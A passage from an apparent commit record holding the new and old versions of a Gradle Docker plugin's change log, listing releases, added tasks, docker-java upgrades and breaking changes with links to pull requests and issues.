- {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` then fall back to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor of the jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - 
{uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures' call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`; instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups, as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on 
`DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix for not checking if the parent dir already exists before creating it with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying a single file from a container and hostPath is set to a directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - 
{uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` calls a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. 
Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. 
Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to the Dockerfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v4.2.0 (TBA)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n * Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n * Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n * Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n * Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task 
incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. 
- {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. 
- {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. 
- {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* 